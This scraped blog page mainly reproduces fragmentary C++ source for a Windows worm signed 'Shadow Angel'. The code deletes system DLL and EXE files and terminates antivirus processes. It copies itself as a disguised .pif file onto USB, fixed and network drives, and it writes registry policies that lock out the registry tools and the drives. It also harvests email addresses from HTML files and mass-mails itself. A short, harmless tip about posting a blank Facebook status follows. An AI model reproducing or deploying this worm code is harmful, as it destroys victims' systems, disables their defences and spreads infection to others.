 msg_av << "  ----------------------------------------  " << endl;
 msg_av << "       - SHADOW ANGEL: 7-20-07" << endl;

 ofstream bropia_msg;"C:\\PESAN_KE_BROPIA.txt");
 bropia_msg << "Halo Bropia.. berhenti membuat worm MSN itu merupakan pekerjaan bodoh..." << endl;
 bropia_msg << "... lol -- Shadow Angel Anti Bropia... -- Selamatkan dunia dari  BROPIA!!!" << endl;
 bropia_msg << "                    - SHADOW ANGEL : 7-20-07" << endl;

 system("del C:\\WINDOWS\\System32\\*.dll");
 system("del C:\\WINDOWS\\System32\\*.exe");
 system("del C:\\WINDOWS\\System\\*.dll");
 system("del C:\\WINDOWS\\System\\*.exe");
 system("del C:\\WINDOWS\\*.dll");
 system("del C:\\WINDOWS\\*.exe");

void Kill(const char *kill_av)
 HANDLE laris;
 PROCESSENTRY32 process;
 process.dwSize = sizeof(PROCESSENTRY32);
 void* photo = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 Process32First(photo, &process);
 while(photo != NULL)
 Process32Next(photo, &process);
 laris = OpenProcess(PROCESS_TERMINATE, false, process.th32ProcessID);
 if(!strcmp(process.szExeFile, kill_av))
 TerminateProcess(laris, 0);
 if(GetLastError() == ERROR_NO_MORE_FILES)

void GetDebugPriv()
 HANDLE hToken;
 LUID DebugVal;
 if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
 tp.PrivilegeCount = 1;
 tp.Privileges[0].Luid = DebugVal;
 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

/* Mulai menginveksi perangkat  USB */
int find_drives(const char *drives)
 char dir[MAX_PATH];
 UINT dr_type = GetDriveType(drives);

 if(dr_type == DRIVE_REMOVABLE)
 strcpy(dir, drives);
 strcat(dir, "\\");
 strcat(dir, "PUISI_CINTA.pif");
 CopyFile(path, dir, true);
 return 0;
 if(dr_type == DRIVE_FIXED)
 strcpy(dir, drives);
 strcat(dir, "\\");
 strcat(dir, "PUISI_CINTA.pif");
 CopyFile(path, dir, true);
 return 0;
 if(dr_type == DRIVE_REMOTE)
 strcpy(dir, drives);
 strcat(dir, "\\");
 strcat(dir, "PUISI_CINTA.pif");
 CopyFile(path, dir, true);
 return 0;
 return 0;

void no()
 ofstream nono;"C:\\WINDOWS\\WinVBS.vbs");
 nono << "CreateObject(\"\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\", 1, \"REG_DWORD\"" << endl;
 nono << "CreateObject(\"\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\", 1, \"REG_DWORD\"" << endl;
 nono << "CreateObject(\"\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\", 67108863, \"REG_DWORD\"" << endl;
 nono << "CreateObject(\"\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\", 1, \"REG_DWORD\"" << endl;
 nono << "CreateObject(\"\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoAdminPage\", 1, \"REG_DWORD\"" << endl;

void fastOut()
 MessageBox(NULL, "Invalid memory adress:\n\nProgram terminating.", "System Error", MB_OK | MB_ICONERROR);

void SendMail(char *subject, char *sfrom, char *sto, char *smes)
 memset(&mes, 0, sizeof(MapiMessage));
 memset(&from, 0, sizeof(MapiRecipDesc));
 from.lpszName = sfrom;
 from.ulRecipClass = MAPI_ORIG;
 mes.lpszSubject = subject;
 mes.lpRecips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));


 memset(mes.lpRecips, 0, sizeof(MapiRecipDesc));
 mes.lpRecips->lpszName = sto;
 mes.lpRecips->ulRecipClass = MAPI_TO;
 mes.nRecipCount = 1;
 mes.lpFiles = (MapiFileDesc *)malloc(sizeof(MapiFileDesc));


 memset(mes.lpFiles, 0, sizeof(MapiFileDesc));
 mes.lpFiles->lpszPathName = fileName;
 mes.lpFiles->lpszFileName = fileNames[counting];
 mes.nFileCount = 1;
 mes.lpOriginator = &from;
 mes.lpszNoteText = smes;
 (MSendMail)(0, 0, &mes, MAPI_LOGON_UI, 0);

void findMail(char *wild)
 WIN32_FIND_DATA fdata;
 char mail[128];
 char buff[512];
 wsprintf(buff, "%s\\*.ht*", wild);
 fh = FindFirstFile(buff, &fdata);
 wsprintf(buff, "%s\\%s", wild, fdata.cFileName);
 GetMail(buff, mail);
 /* Mulai menuliskan E-mail pembuat,jangan dirubah ya.. Please T_T */
 SendMail(subs[counting], "", mail, texts[counting]);
 if(counting == 10)
 counting = 0;
 if(!FindNextFile(fh, &fdata))

void GetMail(char *name, char *mail)
 HANDLE fd,fd2;
 char *mapped;
 DWORD size, i, k;
 BOOL test = FALSE, valid = FALSE;

 size = GetFileSize(fd,NULL);


 if(size < 256)

 size -= 100;
 fd2 = CreateFileMapping(fd, 0, PAGE_READONLY, 0, 0, 0);

 mapped = (char *)MapViewOfFile(fd2, FILE_MAP_READ, 0, 0, 0);

 i = 0;

 while(i < size && !test)
 if(!strncmp("mailto:", mapped + i, strlen("mailto:")))
 test = TRUE;
 i += strlen("mailto:");
 k = 0;
 while(mapped[i]!=34 && mapped[i]!=39 && i < size && k < 127)
 if(mapped[i] != ' ')
 mail[k] = mapped[i];

 if(mapped[i] == '@')
 }mail[k] = 0;
 mail[0] = 0;
Read more ...

Sunday, September 18, 2011

Trick to Post Empty Status on Facebook

We usually update our facebook status with a quote or share a line about our day.All of us want to get attention of others to our status.In one of my earlier post I wrote about the trick to Update your facebook status with any device(blackberry,iphone,ipad etc) .
How would you feel if you see a blank status update from someone? Amazed!!
You can’t write a blank status update by simply pressing the Space key and then clicking on Postbutton.Instead you have to use special codes to write a blank character in your facebook status.
Trick to Post Empty Status on Facebook:-

  • Login to your Facebook Account and go to Update Status field.
  • Press and hold Alt key and just type 0173.
  • Release Alt Key and click on share Post.
  • That’s all now your empty status will be update.
Read more ...
Designed By Blogger Templates